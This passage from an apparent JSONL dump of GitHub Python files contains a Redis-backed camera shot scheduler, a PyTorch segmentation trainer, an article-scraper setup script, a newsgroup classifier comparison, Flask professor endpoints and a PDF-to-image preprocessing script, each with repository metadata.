
+= self.interval\n if time_counter > actual_time:\n self.shot_times.append(time_counter)\n\n def __get_settings_or_default(self):\n self.shot_days = []\n for day in self.days.keys():\n if(self.redis.hget('shot_time_settings', day) == '1'):\n self.shot_days.append(self.days[day])\n\n start_time_setting = self.redis.hget('shot_time_settings', 'start_time')\n if start_time_setting:\n if start_time_setting == 'sunrise':\n self.start_time = self.redis.hget('suntimes', 'sunrise')\n elif start_time_setting == 'civil':\n self.start_time = self.redis.hget('suntimes', 'civil_twilight_begin')\n elif start_time_setting == 'nautical':\n self.start_time = self.redis.hget('suntimes', 'nautical_twilight_begin')\n elif start_time_setting == 'astronomical':\n self.start_time = self.redis.hget('suntimes', 'astronomical_twilight_begin')\n elif start_time_setting == 'individual':\n hour = int(self.redis.hget('shot_time_settings', 'start_individual_hour'))\n minute = int(self.redis.hget('shot_time_settings', 'start_individual_minute'))\n self.start_time = datetime.now().replace(tzinfo=None).astimezone(tz=None).replace(hour=hour, minute=minute, second=0, microsecond=0)\n else:\n self.start_time = None\n else:\n self.start_time = self.redis.hget('suntimes', 'sunrise')\n\n if not self.start_time:\n self.start_time = datetime.now().replace(tzinfo=None).astimezone(tz=None)\n self.start_time = self.start_time.replace(hour=6, minute=0, second=0, microsecond=0)\n\n\n stop_time_setting = self.redis.hget('shot_time_settings', 'stop_time')\n\n if stop_time_setting:\n if stop_time_setting == 'sunset':\n self.stop_time = self.redis.hget('suntimes', 'sunset')\n elif stop_time_setting == 'civil':\n self.stop_time = self.redis.hget('suntimes', 'civil_twilight_end')\n elif stop_time_setting == 'nautical':\n self.stop_time = self.redis.hget('suntimes', 'nautical_twilight_end')\n elif stop_time_setting == 'astronomical':\n self.stop_time = self.redis.hget('suntimes', 'astronomical_twilight_end')\n elif stop_time_setting == 'individual':\n hour = int(self.redis.hget('shot_time_settings', 'stop_individual_hour'))\n minute = int(self.redis.hget('shot_time_settings', 'stop_individual_minute'))\n self.stop_time = datetime.now().replace(tzinfo=None).astimezone(tz=None).replace(hour=hour, minute=minute, second=0, microsecond=0)\n else:\n self.stop_time = None\n else:\n self.stop_time = self.redis.hget('suntimes', 'sunset')\n\n if not self.stop_time:\n self.stop_time = datetime.now().replace(tzinfo=None).astimezone(tz=None)\n self.stop_time = self.stop_time.replace(hour=21, minute=0, second=0, microsecond=0)\n\n try:\n self.interval = timedelta(minutes=int(self.redis.hget('shot_time_settings', 'interval')))\n except TypeError:\n self.interval = timedelta(minutes=15)\n\n def __make_nice_start_time(self):\n # floor start time to minutes\n self.start_time = self.start_time - timedelta(seconds=self.start_time.second)\n\n # floor to 30 minutes, if interval is mod 30\n if (self.interval.seconds / 60) % 30 == 0:\n self.start_time = self.start_time - timedelta(minutes=self.start_time.minute % 30)\n # floor to 15 minutes, if interval is mod 15\n elif (self.interval.seconds / 60) % 15 == 0:\n self.start_time = self.start_time - timedelta(minutes=self.start_time.minute % 15)\n # floor to 10 minutes, if interval is mod 5\n elif (self.interval.seconds / 60) % 5 == 0:\n self.start_time = self.start_time - timedelta(minutes=self.start_time.minute % 10)\n\n def write_to_redis(self):\n self.redis.delete('shot_times')\n\n for shot_time in 
self.shot_times:\n self.redis.rpush('shot_times', shot_time)\n", "repo_name": "siggdev/kmlabs_cameraControl", "sub_path": "library/ShotTimeCalculator.py", "file_name": "ShotTimeCalculator.py", "file_ext": "py", "file_size_in_byte": 5169, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "RedisDriver.RedisDriver", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 23, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 57, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 57, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 64, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 64, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 82, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 82, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 89, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 89, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 93, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 95, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 99, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 106, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 109, "usage_type": "call"}]} +{"seq_id": "73793669405", "text": "from voc_dataloader import VOC_Dataset\r\nfrom model import Segmentation_Model\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nimport torch.nn.functional as F\r\nfrom torch.utils.data import DataLoader\r\nimport argparse\r\nimport sys\r\nimport numpy as np\r\nfrom torchvision import utils\r\n\r\nimport pdb\r\n\r\n\r\ndef cross_entropy2d(input, target):\r\n n, c, h, w = input.size()\r\n nt, ht, wt = target.size()\r\n\r\n if h != ht and w != wt: # upsample labels\r\n input = F.interpolate(input, size=(ht, wt), mode=\"bilinear\", align_corners=True)\r\n\r\n input_ = input.transpose(1, 2).transpose(2, 3).contiguous().view(-1, c)\r\n target = target.view(-1)\r\n loss = F.cross_entropy(input_, target) #+ 1e-2*torch.abs(torch.argmax(input, dim=1).view(-1) - target)\r\n\r\n return loss\r\n\r\ndef train(epoch, dataloader, model):\r\n avg_loss = 0\r\n for i, (img, ann) in enumerate(dataloader):\r\n img = img.to(device)\r\n ann = ann.to(device)\r\n\r\n pred = model(img)\r\n loss = cross_entropy2d(pred, ann)\r\n avg_loss += loss.item()\r\n optim.zero_grad()\r\n loss.backward()\r\n optim.step()\r\n\r\n sys.stdout.write('\\r Epoch: %3d [%d/%d] Loss: %8.4f'%(epoch, i, len(dataloader), loss.item()))\r\n pred_rgb, rgb_t = decode_pred(pred, ann)\r\n utils.save_image(torch.cat([img, pred_rgb/255., rgb_t/255.], dim=0), 'results/results_%d.jpeg'%i)\r\n print('\\n Average Loss:%4.3f'%(avg_loss/len(dataloader)))\r\n torch.save(model, 'checkpoints/model_%d.ckpt'%epoch)\r\n\r\ndef decode_pred(pred, target):\r\n pred = torch.argmax(pred, dim=1)\r\n target_mask = target.detach().cpu().numpy()\r\n label_mask = pred.detach().cpu().numpy()\r\n r = label_mask.copy()\r\n g = label_mask.copy()\r\n b = label_mask.copy()\r\n rt = target_mask.copy()\r\n gt = target_mask.copy()\r\n bt = target_mask.copy()\r\n for 
ll in range(0, 21):\r\n r[label_mask == ll] = label_colours[ll, 0]\r\n g[label_mask == ll] = label_colours[ll, 1]\r\n b[label_mask == ll] = label_colours[ll, 2]\r\n\r\n rt[target_mask == ll] = label_colours[ll, 0]\r\n gt[target_mask == ll] = label_colours[ll, 1]\r\n bt[target_mask == ll] = label_colours[ll, 2]\r\n\r\n \"\"\"\r\n rgb = np.zeros((label_mask.shape[0], label_mask.shape[1], 3))\r\n rgb[:, :, 0] = r / 255.0\r\n rgb[:, :, 1] = g / 255.0\r\n rgb[:, :, 2] = b / 255.0\r\n \"\"\"\r\n r = np.expand_dims(r, axis=1)\r\n g = np.expand_dims(g, axis=1)\r\n b = np.expand_dims(b, axis=1)\r\n rgb = np.concatenate((r, g, b), axis=1)\r\n rgb = torch.from_numpy(rgb)\r\n #rgb = rgb/255.0\r\n\r\n rt = np.expand_dims(rt, axis=1)\r\n gt = np.expand_dims(gt, axis=1)\r\n bt = np.expand_dims(bt, axis=1)\r\n rgbt = np.concatenate((rt, gt, bt), axis=1)\r\n rgbt = torch.from_numpy(rgbt)\r\n #rgbt = rgbt/255.0\r\n\r\n return rgb.to(device).type(torch.cuda.FloatTensor), rgbt.to(device).type(torch.cuda.FloatTensor)\r\n\r\n\r\n\r\n\r\ndef eval(dataloader, model):\r\n for i, (img, ann) in enumerate(dataloader):\r\n img = img.to(device)\r\n ann = ann.to(device)\r\n pred = model(img)\r\n label_colours = dataloader.dataset.get_pascal_labels()\r\n label_mask = pred.detach().cpu().numpy()\r\n print(label_mask)\r\n r = label_mask.copy()\r\n g = label_mask.copy()\r\n b = label_mask.copy()\r\n for ll in range(0, self.n_classes):\r\n r[label_mask == ll] = label_colours[ll, 0]\r\n g[label_mask == ll] = label_colours[ll, 1]\r\n b[label_mask == ll] = label_colours[ll, 2]\r\n rgb = np.zeros((label_mask.shape[0], label_mask.shape[1], 3))\r\n rgb[:, :, 0] = r / 255.0\r\n rgb[:, :, 1] = g / 255.0\r\n rgb[:, :, 2] = b / 255.0\r\n utils.save_image(torch.cat([img, pred, ann], dim=1), 'results.jpeg')\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(description='Pytorch Implementation of Image Segmentation')\r\n parser.add_argument('--lr', default=1e-3, type=float)\r\n parser.add_argument('--batch-size', default=8, type=int)\r\n parser.add_argument('--epochs', default=200, type=int)\r\n args = parser.parse_args()\r\n print(args)\r\n\r\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n dataset = VOC_Dataset()\r\n dataloader = DataLoader(dataset, batch_size = args.batch_size, shuffle=True, pin_memory=True)\r\n label_colours = dataset.get_pascal_labels()\r\n\r\n model = Segmentation_Model().to(device)\r\n optim = optim.Adam(model.parameters(), lr=args.lr, betas=(0.9, 0.99))\r\n\r\n for epoch in range(args.epochs):\r\n train(epoch, dataloader, model)", "repo_name": "DeokyunKim/Research_Project", "sub_path": "Image_Segmentation/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 4598, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "torch.nn.functional.interpolate", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.optim.zero_grad", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.optim.step", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 40, "usage_type": "name"}, {"api_name": "sys.stdout.write", 
"line_number": 42, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torchvision.utils.save_image", "line_number": 44, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 87, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 107, "usage_type": "call"}, {"api_name": "torchvision.utils.save_image", "line_number": 111, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 111, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 121, "usage_type": "attribute"}, {"api_name": "voc_dataloader.VOC_Dataset", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 123, "usage_type": "call"}, {"api_name": "model.Segmentation_Model", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 127, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 127, "usage_type": "call"}, {"api_name": "model.parameters", "line_number": 127, "usage_type": "call"}]} +{"seq_id": "32408132377", "text": "import scraper\nimport json\nimport reccommendations\n\ndef main():\n # Start the scraper. 
The scraper combs designated sites for articles and performs some clustering algorithms on them.\n data = scraper.processData()\n \n #for cluster in data['clusters']:\n # for document in cluster['points']:\n # print(document['title'])\n # print(\"============================\")\n \n # Save the data to a text file, to be displayed by the frontend\n #with open('ArticleData.txt', 'w') as outfile:\n # json.dump(data, outfile)\n\n #with open('ArticleData.txt') as json_file:\n # data = json.load(json_file)\n \n for cluster in data['clusters']:\n for article in cluster['points']:\n reccs = []\n reccs = reccommendations.getReccomendations(article, cluster['points'])\n \n related = []\n for rec in reccs:\n related.append({'id': str(rec[1]['id']), 'title': rec[1]['title']})\n \n article.update({'related': related})\n \n # Create a tree structure that's easier for javascript to read\n articles = {}\n for cluster in data['clusters']:\n for document in cluster['points']:\n docPod = {\n 'title': document['title'],\n 'content': document['content'],\n 'related': document['related']\n }\n if str(document['id']) not in articles:\n articles.update({str(document['id']): docPod})\n\n #Save the data to a text file, to be displayed by the frontend\n with open('./FrontendFiles/bakedData.json', 'w') as outfile:\n json.dump(articles, outfile)\n \nmain()\n", "repo_name": "ezrabartlett/ArticleScraper", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1683, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "scraper.processData", "line_number": 7, "usage_type": "call"}, {"api_name": "reccommendations.getReccomendations", "line_number": 24, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "32280750123", "text": "# SYSTEM IMPORTS\nimport copy\nimport numpy\nimport os\nimport re\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nimport sys\n\n_current_dir_ = os.path.abspath(os.path.dirname(__file__))\n_src_dir_ = os.path.join(_current_dir_, \"..\", \"..\", \"..\")\n_naive_bayes_classifier_dir_ = os.path.join(_src_dir_, \"naive-bayes-classifier\")\n_dirs_to_add_ = [_current_dir_, _src_dir_, _naive_bayes_classifier_dir_]\nfor _dir_ in _dirs_to_add_:\n if _dir_ not in sys.path:\n sys.path.append(_dir_)\ndel _dirs_to_add_\ndel _naive_bayes_classifier_dir_\ndel _src_dir_\ndel _current_dir_\n\n\n# PYTHON PROJECT IMPORTS\nfrom mlpy.bayesian import text_classifier\nfrom mlpy.bayesian.stdlabels import discrete_label\n\nfrom naiveBayesClassifier import tokenizer\nfrom naiveBayesClassifier.trainer import Trainer\nfrom naiveBayesClassifier.classifier import Classifier\n\n\ncategories = [\"alt.atheism\", \"soc.religion.christian\", \"comp.graphics\", \"sci.med\"]\ntokenization_string = \"[\\\"'\\|_().,!-<>/\\\\=\\?\"\ndef word_filter(example):\n return [x for x in re.sub(str([tokenization_string]), \"\", example.lower()).split() if len(x) > 3]\n\n\ndef filter_data(data):\n new_data = list()\n for i in data:\n new_data.append(u\"%s\" % ' '.join(word_filter(i)))\n return new_data\n\n\ndef create_and_partition_dataset():\n training_set = fetch_20newsgroups(subset=\"train\", categories=categories, shuffle=True,\n random_state=42)\n validation_set = fetch_20newsgroups(subset=\"test\", categories=categories, shuffle=True,\n random_state=42)\n\n return 
(training_set.data, training_set.target),\\\n (validation_set.data, validation_set.target)\n\n\n# def convert_examples_to_text_classifier_using_sklearn(count_vectorizer, examples):\n# feature_vectors = list()\n# analyze_func = count_vectorizer.build_analyzer()\n# for example in examples:\n# feature_vectors.append(dict.fromkeys(analyze_func(example), 1.0))\n# return feature_vectors\n\n\ndef create_text_classifier(training_examples, training_annotations):\n print(\"creating text classifier\")\n class_label = discrete_label(\"type\", categories)\n # since actual annotations are in range of [1, 4] (all integers)\n # then to convert them to the appropriate label would be to subtract 1 from each\n training_annotations = [categories[x] for x in training_annotations]\n\n classifier = text_classifier()\n classifier.train(training_examples, training_annotations, class_label, word_filter)\n print(\"\\t->done\")\n return classifier\n\n\ndef create_sklearn_classifier(training_examples, training_annotations):\n print(\"creating sklearn classifier\")\n examples = filter_data(training_examples)\n count_vec = CountVectorizer(binary=True)\n\n examples = count_vec.fit_transform(examples)\n classifier = MultinomialNB().fit(examples, training_annotations)\n print(\"\\t->done\")\n return count_vec, classifier\n\n\ndef create_naive_bayes_classifier(training_examples, training_annotations):\n print(\"creating naive bayes classifier\")\n annotations = [categories[x] for x in training_annotations]\n\n news_trainer = Trainer(tokenizer.Tokenizer(stop_words=[], signs_to_remove=[tokenization_string]))\n for example, annotation in zip(training_examples, annotations):\n news_trainer.train(example, annotation)\n classifier = Classifier(news_trainer.data, tokenizer.Tokenizer(stop_words=[], signs_to_remove=[tokenization_string]))\n print(\"\\t->done\")\n return classifier\n\n\ndef test_text_classifier(classifier, validation_examples, validation_annotations):\n print(\"testing text classifier\")\n annotations = [categories[x] for x in validation_annotations]\n\n output_scores = list()\n for output_dist in classifier.classify_text(validation_examples):\n output_scores.append(categories[numpy.argmax(output_dist)])\n\n print(\"\\t->done\")\n return numpy.mean(numpy.array(annotations) == numpy.array(output_scores))\n\n\ndef test_sklearn_classifier(count_vec, classifier, validation_examples, validation_annotations):\n print(\"testing sklearn classifier\")\n examples = count_vec.transform(validation_examples)\n\n output_scores = classifier.predict(examples)\n print(\"\\t->done\")\n return numpy.mean(validation_annotations == output_scores)\n\n\ndef test_naive_bayes_classifier(classifier, validation_examples, validation_annotations):\n print(\"testing naive bayes classifier\")\n annotations = [categories[x] for x in validation_annotations]\n\n output_scores = list()\n for example in validation_examples:\n output_scores.append(classifier.classify(example)[0][0])\n # print(output_scores)\n print(\"\\t->done\")\n return numpy.mean(numpy.array(annotations) == numpy.array(output_scores))\n \n\ndef main():\n\n ## making training a validation sets\n training_set, validation_set = create_and_partition_dataset()\n training_examples, training_annotations = training_set\n validation_examples, validation_annotations = validation_set\n\n text_classifier = create_text_classifier(copy.deepcopy(training_examples),\n copy.deepcopy(training_annotations))\n count_vec, sklearn_classifier = create_sklearn_classifier(copy.deepcopy(training_examples),\n 
copy.deepcopy(training_annotations))\n nb_classifier = create_naive_bayes_classifier(copy.deepcopy(training_examples),\n copy.deepcopy(training_annotations))\n\n sklearn_accuracy = test_sklearn_classifier(count_vec, sklearn_classifier,\n copy.deepcopy(validation_examples),\n copy.deepcopy(validation_annotations))\n text_classifier_accuracy = test_text_classifier(text_classifier,\n copy.deepcopy(validation_examples),\n copy.deepcopy(validation_annotations))\n nb_accuracy = test_naive_bayes_classifier(nb_classifier,\n copy.deepcopy(validation_examples),\n copy.deepcopy(validation_annotations))\n print(\"text_classifier accuracy: %s\" % text_classifier_accuracy)\n print(\"sklearn accuracy: %s\" % sklearn_accuracy)\n print(\"nb_accuracy: %s\" % nb_accuracy)\n\n\nif __name__ == \"__main__\":\n main()\n\n", "repo_name": "aew61/mlpy", "sub_path": "src/mlpy/bayesian/test/compare_newsgroups_classifiers.py", "file_name": "compare_newsgroups_classifiers.py", "file_ext": "py", "file_size_in_byte": 6556, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "os.path.abspath", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 36, "usage_type": "call"}, {"api_name": "sklearn.datasets.fetch_20newsgroups", "line_number": 47, "usage_type": "call"}, {"api_name": "sklearn.datasets.fetch_20newsgroups", "line_number": 49, "usage_type": "call"}, {"api_name": "mlpy.bayesian.stdlabels.discrete_label", "line_number": 66, "usage_type": "call"}, {"api_name": "mlpy.bayesian.text_classifier", "line_number": 71, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 80, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.MultinomialNB", "line_number": 83, "usage_type": "call"}, {"api_name": "naiveBayesClassifier.trainer.Trainer", "line_number": 92, "usage_type": "call"}, {"api_name": "naiveBayesClassifier.tokenizer.Tokenizer", "line_number": 92, "usage_type": "call"}, {"api_name": "naiveBayesClassifier.tokenizer", "line_number": 92, "usage_type": "name"}, {"api_name": "naiveBayesClassifier.classifier.Classifier", "line_number": 95, "usage_type": "call"}, {"api_name": "naiveBayesClassifier.tokenizer.Tokenizer", "line_number": 95, "usage_type": "call"}, {"api_name": "naiveBayesClassifier.tokenizer", "line_number": 95, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 130, "usage_type": "call"}, {"api_name": "mlpy.bayesian.text_classifier", "line_number": 140, 
"usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 140, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 141, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 142, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 143, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 144, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 145, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 148, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 149, "usage_type": "call"}, {"api_name": "mlpy.bayesian.text_classifier", "line_number": 150, "usage_type": "argument"}, {"api_name": "copy.deepcopy", "line_number": 151, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 152, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 154, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 155, "usage_type": "call"}]} +{"seq_id": "12872343686", "text": "from controllers.user.professors import professors_controller\nfrom methods.auth import *\nfrom methods.errors import *\nfrom flask_restful import Resource, reqparse\nfrom flask import jsonify\n\ncontroller_object = professors_controller()\n\n\n# /professors/\nclass Professor(Resource):\n # method_decorators = {'get': [requires_auth('')]}\n\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('user_id', type=str, location='json')\n self.reqparse.add_argument('scientific_degree', type=str, location='json')\n\n def get(self, user_id):\n try:\n professor = controller_object.get_professor(user_id)\n except ErrorHandler as e:\n return e.error\n return jsonify({'professor': professor,\n 'status_code': 200})\n\n def put(self, user_id):\n args = self.reqparse.parse_args()\n professor = {'user_id': user_id, 'scientific_degree': args['scientific_degree']}\n try:\n controller_object.update_professor(user_id, professor)\n except ErrorHandler as e:\n return e.error\n return jsonify({\n 'professor': professor,\n 'message': 'professor updated successfully',\n 'status code': 200\n })\n\n def delete(self, user_id):\n try:\n professor = controller_object.delete_professor(user_id)\n except ErrorHandler as e:\n return e.error\n return jsonify({\n 'professor': professor,\n 'message': 'professor deleted successfully',\n 'status_code': 200\n })\n # Put and post methods are to be done\n\n\n# /professors\nclass Professors(Resource):\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('user_id', type=str, location='json')\n self.reqparse.add_argument('scientific_degree', type=str, location='json')\n\n def get(self):\n try:\n professrs = controller_object.get_all_professors()\n except ErrorHandler as e:\n return e.error\n return {\n 'total_professors': len(professrs),\n 'status_code': 200,\n 'professors': professrs\n }\n\n def post(self):\n args = self.reqparse.parse_args()\n\n new = {\n 'user_id': args['user_id'],\n 'scientific_degree': args['scientific_degree']}\n try:\n controller_object.post_professor(new)\n except ErrorHandler as e:\n return e.error\n return jsonify({'message': 'professor added successfully', 'status_code': 200})", "repo_name": "Graduation-Team-2021/LMS-Graduation-Project", "sub_path": "backend/views/user/professors.py", "file_name": "professors.py", "file_ext": "py", "file_size_in_byte": 2634, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", 
"api": [{"api_name": "controllers.user.professors.professors_controller", "line_number": 7, "usage_type": "call"}, {"api_name": "flask_restful.Resource", "line_number": 11, "usage_type": "name"}, {"api_name": "flask_restful.reqparse.RequestParser", "line_number": 15, "usage_type": "call"}, {"api_name": "flask_restful.reqparse", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 45, "usage_type": "call"}, {"api_name": "flask_restful.Resource", "line_number": 54, "usage_type": "name"}, {"api_name": "flask_restful.reqparse.RequestParser", "line_number": 56, "usage_type": "call"}, {"api_name": "flask_restful.reqparse", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "23374733086", "text": "\"\"\"\nConvert a directory of PDFs to a directory\nof XML annotations.\n\"\"\"\nfrom time import sleep\nfrom os import mkdir, listdir\nfrom subprocess import call\nfrom glob import glob\nfrom os.path import splitext, join\nfrom multiprocessing import Pool\nfrom PIL import ImageOps, Image\nfrom functools import partial\n\n\ndef preprocess(input_dir, output_dir, args):\n \"\"\"\n script entry point\n :param input_dir: Path to directory of PDFs\n :param output_dir: Desired output directory for XML\n :return:\n \"\"\"\n # used to store intermediate PNGs\n\n try:\n mkdir(output_dir)\n pdf2png(input_dir, output_dir)\n except FileExistsError:\n print(\"output and tmp directories exist, overwriting...\")\n sleep(2)\n pad_pngs(output_dir, args[\"padding\"])\n\n\n\ndef pdf2png(input_dir, tmp_dir):\n \"\"\"\n Convert PDFs into a directory of PNGs\n :param input_dir:\n :return:\n \"\"\"\n # first we create all the directories we need\n files = glob(join(input_dir, \"*.pdf\"))\n\n def build_path(pdf_path):\n # take out input_dir\n pdf_path = pdf_path.split(\"/\")[1]\n return splitext(pdf_path)[0]\n\n dir_names = map(build_path, files)\n # this is more parallelizable than we're taking advantage of\n for name in dir_names:\n mkdir(join(tmp_dir, name))\n # now call ghostscript each file\n call([\"./ghost.sh\", name, f\"{join(input_dir,name)}.pdf\", tmp_dir])\n\n\ndef resize_png(path, size=1920):\n im = Image.open(path).convert('RGB')\n w, h = im.size\n if w >= size or h >= size:\n maxsize = (1920, 1920)\n im.thumbnail(maxsize, Image.ANTIALIAS)\n else:\n im = resize_image(im, size)\n return path,im\n\ndef pad_image(path, image=None, size=1920):\n im = Image.open(path).convert('RGB') if image is None else image\n w, h = im.size\n d_w = size - w\n d_h = size - h\n if d_h < 0 or d_w < 0:\n print(f'w: {w}, h: {h}')\n raise Exception(\"negative pad\")\n padding = (0,0,d_w, d_h)\n im_2 = ImageOps.expand(im, padding, fill=\"#fff\")\n return path,im_2\n\n\ndef resize_image(im, new_h):\n w,h = im.size\n if h > w:\n ratio = float(new_h)/h\n new_w = round(ratio*w)\n else:\n new_w = new_h\n ratio = float(new_w)/w\n new_h = round(ratio*h)\n im = im.resize((new_w, new_h), resample=Image.LANCZOS)\n return im\n\n\ndef pad_pngs(tmp_dir, padding):\n \"\"\"\n pad a directory of images\n :param tmp_dir:\n :return:\n \"\"\"\n pool = Pool(processes=4)\n dirs = listdir(tmp_dir)\n for dir in tqdm(dirs):\n pngs = glob(join(tmp_dir, dir, \"*.png\"))\n mapper = partial(pad_image, size=padding)\n images = pool.map(mapper, pngs)\n for path, image in tqdm(images):\n path = splitext(path)[0]\n 
image.save(f\"{path}.jpg\", \"jpeg\")\n\n\n\n\nif __name__ == \"__main__\":\n args = {\n \"padding\": 1920,\n \"collapse\": False,\n \"model_dir\": \"weights\"\n }\n preprocess(\"data\", \"out\", args)\n", "repo_name": "UW-COSMOS/Cosmos", "sub_path": "cosmos/ingestion/ingest/process/detection/src/torch_model/utils/preprocess.py", "file_name": "preprocess.py", "file_ext": "py", "file_size_in_byte": 2981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 36, "dataset": "github-code", "pt": "86", "api": [{"api_name": "os.mkdir", "line_number": 25, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 29, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 46, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 57, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 57, "usage_type": "name"}, 